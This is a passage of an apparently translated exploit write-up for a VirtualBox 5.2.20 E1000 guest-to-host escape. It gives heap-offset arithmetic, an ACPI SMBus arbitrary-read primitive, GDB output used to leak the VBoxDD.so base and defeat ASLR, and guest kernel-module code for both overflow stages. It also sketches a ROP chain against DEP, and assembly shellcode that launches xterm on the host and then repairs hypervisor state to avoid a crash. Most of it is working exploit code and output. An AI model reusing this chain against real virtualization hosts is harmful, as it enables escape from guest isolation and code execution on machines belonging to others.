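#define E1000_INSTANCE   UINT64_C(0x7fc470083400)
#define ICHAC97_INSTANCE UINT64_C(0x7fc470088b00)
#define OHCI_INSTANCE    UINT64_C(0x7fc47008a4e0)
#define ACPI_INSTANCE    UINT64_C(0x7fc47008be70)

/* Distance in bytes between two device instances. */
uint64_t instance_distance(uint64_t from, uint64_t to)
{
    return to - from;
}
```

Summing the three steps (0x5700, 0x19E0, 0x1990) places the ACPI instance 0x8A70 bytes after the E1000 instance in this run.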
The state of the ACPI device is described by the following structure (file src/VBox/Devices/PC/DevACPI.cpp):

    typedef struct ACPIState
    {
        ...
        uint8_t au8SMBusBlkDat[32];
        uint8_t u8SMBusBlkIdx;
        uint32_t uPmTimeOld;
        uint32_t uPmTimeA;
        uint32_t uPmTimeB;
        uint32_t Alignment5;
    } ACPIState;

An I/O port handler is registered for the port range 0x4100-0x410F. For port 0x4107 we have:

    PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
    {
        RT_NOREF1(pDevIns);
        ACPIState *pThis = (ACPIState *)pvUser;
        ...
        switch (off)
        {
            ...
            case SMBBLKDAT_OFF:
                *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
                pThis->u8SMBusBlkIdx++;
                pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
                break;
            ...
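When the guest executes an INB instruction on port 0x4107, the handler takes one byte from the au8SMBusBlkDat[32] array at index u8SMBusBlkIdx and returns it to the guest. This is where the write primitive comes in: since the distances between the heap blocks of the virtual devices are constant, the distance from the EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx is constant as well. By overwriting ACPIState.u8SMBusBlkIdx, we can read arbitrary data within 255 bytes of ACPIState.au8SMBusBlkDat.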
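The read side can be modelled in the same spirit. In this sketch (names and sizes are assumptions) a 512-byte array plays the role of au8SMBusBlkDat together with whatever follows it in memory, and `model_blkdat_read` mirrors the three statements of the SMBBLKDAT_OFF case: read, increment, mask.

```c
#include <assert.h>
#include <stdint.h>

#define BLK_DAT_SIZE 32u

typedef struct {
    uint8_t mem[512];   /* mem[0..31] models au8SMBusBlkDat; the rest models what follows it */
    uint8_t idx;        /* models u8SMBusBlkIdx */
} smbus_model_t;

/* Models the SMBBLKDAT_OFF read: return the byte at idx, then advance and wrap. */
uint8_t model_blkdat_read(smbus_model_t *s)
{
    uint8_t value = s->mem[s->idx];
    s->idx++;
    s->idx &= BLK_DAT_SIZE - 1u;   /* the mask is applied only after the read */
    return value;
}
```

The mask is applied after the byte has been fetched, so an index planted from outside is honoured once and then wrapped back into the 0..31 range. That is consistent with the exploit rewriting the index before every leaked byte.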
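There is an obstacle. In ACPIState, the array, the u8SMBusBlkIdx index, and the few fields after them sit at the very end of the structure, and none of them is worth leaking. So what matters is the data located right after ACPIState in memory: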
    gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
    0x7fc47008d4e0: 0xffffe98100000090  0xfffd9b2000000000
    0x7fc47008d4f0: 0x00007fc470067a00  0x00007fc470067a00
    0x7fc47008d500: 0x00000000a0028a00  0x00000000000e0000
    0x7fc47008d510: 0x00000000000e0fff  0x0000000000001000
    0x7fc47008d520: 0x000000ff00000002  0x0000100000000000
    0x7fc47008d530: 0x00007fc47008c358  0x00007fc44d6ecdc6
    0x7fc47008d540: 0x0031000035944000  0x00000000000002b8
    0x7fc47008d550: 0x00280001d3878000  0x0000000000000000
    gef➤  x/s 0x00007fc44d6ecdc6
    0x7fc44d6ecdc6: "ACPI RSDP"
    gef➤  vmmap VBoxDD.so
    Start              End                Offset             Perm Path
    0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 rx /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
    0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
    0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
    0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
    gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
    $2 = 0x1f9dc6
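So, at offset 0x58 past the end of ACPIState there is a pointer to a string located at a fixed RVA inside VBoxDD.so. Reading this pointer gives us the base address of VBoxDD.so and defeats ASLR. This relies on the data after ACPIState being the same on every virtual machine start; in my runs the pointer was always there, at offset 0x58 past ACPIState.
Now we combine the primitives to bypass ASLR. We overflow the heap to overwrite the EEPROM93C46 structure, trigger the EEPROM state machine to write the index into ACPIState, and execute INB(0x4107) in the guest so that ACPI returns one byte of the pointer. This is repeated 8 times, incrementing the index each time.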
    uint64_t stage_1_main(void* mmio, void* tx_ring) {
        printk(KERN_INFO PFX"##### Stage 1 #####\n");

        // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor
        // is sent back to the guest and handled right now via e1kHandleRxPacket.
        // When loopback mode is disabled data is sent to a network as usual.
        // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
        // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and
        // the stack buffer.
        e1000_disable_loopback_mode(mmio);

        uint8_t leaked_bytes[8];
        uint32_t i;
        for (i = 0; i < 8; i++) {
            stage_1_overflow_heap_buffer(mmio, tx_ring, i);
            leaked_bytes[i] = stage_1_leak_byte();

            printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
        }

        uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
        uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
        printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
        printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

        return vboxdd_base;
    }
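The last step of stage 1, turning eight leaked bytes into a module base, can be checked against the GDB session above. In this sketch the RVA 0x1f9dc6 is the value printed by GDB for that particular build (the value of LEAKED_VBOXDD_RVA in the exploit is not shown in the article), and the function names are invented.

```c
#include <assert.h>
#include <stdint.h>

/* RVA of the leaked pointer inside VBoxDD.so, taken from the GDB session;
 * valid only for that particular build. */
#define LEAKED_RVA UINT64_C(0x1f9dc6)

/* Assemble a pointer from 8 bytes leaked in little-endian order. */
uint64_t pointer_from_bytes(const uint8_t b[8])
{
    uint64_t p = 0;
    for (int i = 7; i >= 0; --i)
        p = (p << 8) | b[i];
    return p;
}

/* Module base = leaked pointer minus its known offset inside the module. */
uint64_t module_base(uint64_t leaked_ptr)
{
    return leaked_ptr - LEAKED_RVA;
}
```

Feeding in the bytes of 0x00007fc44d6ecdc6 yields the base 0x00007fc44d4f3000, which matches the first mapping shown by vmmap.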
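As mentioned, for the integer underflow not to end in a stack buffer overflow, certain E1000 registers have to be configured. The stack buffer is overflowed in e1kHandleRxPacket, which is called while Tx descriptors are handled in loopback mode. Indeed, in loopback mode the guest sends packets to itself, so they are received immediately after being sent. With this mode disabled, e1kHandleRxPacket is not called.
ASLR is bypassed. Now loopback mode can be enabled to trigger the stack buffer overflow.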
    void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
        off_t buffer_pa;
        void* buffer_va;
        alloc_buffer(&buffer_pa, &buffer_va);

        stage_2_set_up_buffer(buffer_va, vboxdd_base);
        stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

        free_buffer(buffer_va);
    }

    void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
        printk(KERN_INFO PFX"##### Stage 2 #####\n");

        e1000_enable_loopback_mode(mmio);
        stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
        e1000_disable_loopback_mode(mmio);
    }
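Now, when e1kHandleRxPacket returns, the saved return address has been overwritten and control goes wherever the attacker wants. DEP is still in the way, though. It is bypassed in the classic manner with a ROP chain that allocates executable memory, copies the shellcode loader into it, and runs it.
The shellcode loader is simple: it copies the main shellcode from the overflowed stack buffer to the memory right after itself.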
    use64

    start:
        lea rsi, [rsp - 0x4170];
        push rax
        pop rdi
        add rdi, loader_size
        mov rcx, 0x800
        rep movsb
        nop

    payload:
        ; Here the shellcode is to be

    loader_size = $ - start

The loader then runs the shellcode. Its first part:

    use64

    start:
        ; sys_fork
        mov rax, 58
        syscall

        test rax, rax
        jnz continue_process_execution

        ; Initialize argv
        lea rsi, [cmd]
        mov [argv], rsi

        ; Initialize envp
        lea rsi, [env]
        mov [envp], rsi

        ; sys_execve
        lea rdi, [cmd]
        lea rsi, [argv]
        lea rdx, [envp]
        mov rax, 59
        syscall

    ...

    cmd db '/usr/bin/xterm', 0
    env db 'DISPLAY=:0.0', 0
    argv dq 0, 0
    envp dq 0, 0

It calls fork and execve to start /usr/bin/xterm. The attacker now has code execution in ring 3 of the host.
After that, the hypervisor process should keep running as if nothing had happened instead of crashing. This is the job of the second part of the shellcode.

    continue_process_execution:
        ; Restore RBP
        mov rbp, rsp
        add rbp, 0x48

        ; Skip junk
        add rsp, 0x10

        ; Restore the registers that must be preserved according to System V ABI
        pop rbx
        pop r12
        pop r13
        pop r14
        pop r15

        ; Skip junk
        add rsp, 0x8

        ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
        ; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
        ; After: "E1000-Xmit" -> NULL

        ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
        ; This was unnecessary on my testing machines but to be sure...
        mov rdi, [rbx]
        mov rax, 0x0
        mov rcx, 0xA0
        rep stosb

        ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
        ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1")
        ; will be corrupted in MMHyperFree
        mov qword [rbx], 0x0

        ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

        ret
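To continue execution, the shellcode has to return into the call chain that led to e1kHandleRxPacket. The nearest stack frames are destroyed by the overflowing buffer and the ROP chain, so it returns to a frame further up that survived.
The call chain leading to e1kHandleRxPacket is:

    #0 e1kHandleRxPacket
    #1 e1kTransmitFrame
    #2 e1kXmitDesc
    #3 e1kXmitPacket
    #4 e1kXmitPending
    #5 e1kR3NetworkDown_XmitPending
    ...

The shellcode returns to e1kR3NetworkDown_XmitPending, which has nothing left to do after the call to e1kXmitPending:

    static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
    {
        PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
        /* Resume suspended transmission */
        STATUS &= ~STATUS_TXOFF;
        e1kXmitPending(pThis, true /*fOnWorkerThread*/);
    }

The shellcode sets RBP to RSP plus 0x48, the value it should have in e1kR3NetworkDown_XmitPending. Then RBX, R12, R13, R14, and R15 are restored from the stack, since the System V ABI requires a callee to preserve them. Without this, the hypervisor would crash on the garbage pointers left in these registers.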
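That alone is enough for the virtual machine to keep running. However, when the VM is shut down, an access violation occurs in PDMR3QueueDestroyDevice. The reason is that the heap overflow overwrites an important PDMQUEUE structure, specifically with the last part of the ROP chain, that is, its last 16 bytes. I tried to shorten the ROP chain and failed, and when I restored the data by hand the hypervisor still crashed, so the problem was less obvious than it seemed.
It turned out that the overwritten data belongs to a linked list, and the fix is simple. This is what the shellcode does:

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before: "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After: "E1000-Xmit" -> NULL

With the last two elements unlinked, the virtual machine shuts down cleanly.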
Source: https://habr.com/ru/post/429004/